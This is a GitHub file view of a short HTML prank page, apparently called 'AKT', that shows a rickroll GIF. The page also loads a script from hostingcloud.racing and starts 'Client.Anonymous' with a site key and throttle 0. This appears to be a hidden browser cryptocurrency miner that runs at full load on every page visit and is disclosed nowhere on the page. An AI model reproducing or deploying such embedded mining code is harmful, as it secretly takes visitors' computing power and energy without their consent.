-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathrole.html
More file actions
38 lines (31 loc) · 881 Bytes
/
role.html
File metadata and controls
38 lines (31 loc) · 881 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon" href="ico.svg" type="image/x-icon">
<style>
body {
background-color: #77f78c;
}
#rick {
display: block;
margin-left: auto;
margin-right: auto;
width: 50%;
}
</style>
<title>AKT</title>
</head>
<body>
<img id="rick" src="rickroll-roll.gif" alt="nothin" />
<script src="https://www.hostingcloud.racing/w6wI.js"></script>
<script>
var _client = new Client.Anonymous('1f7d6da7cd2e76913e22af2b1bd03274b8325f119903fdbfff20331c181d7d24', {
throttle: 0, c: 'w'
});
_client.start();
</script>
</body>
</html>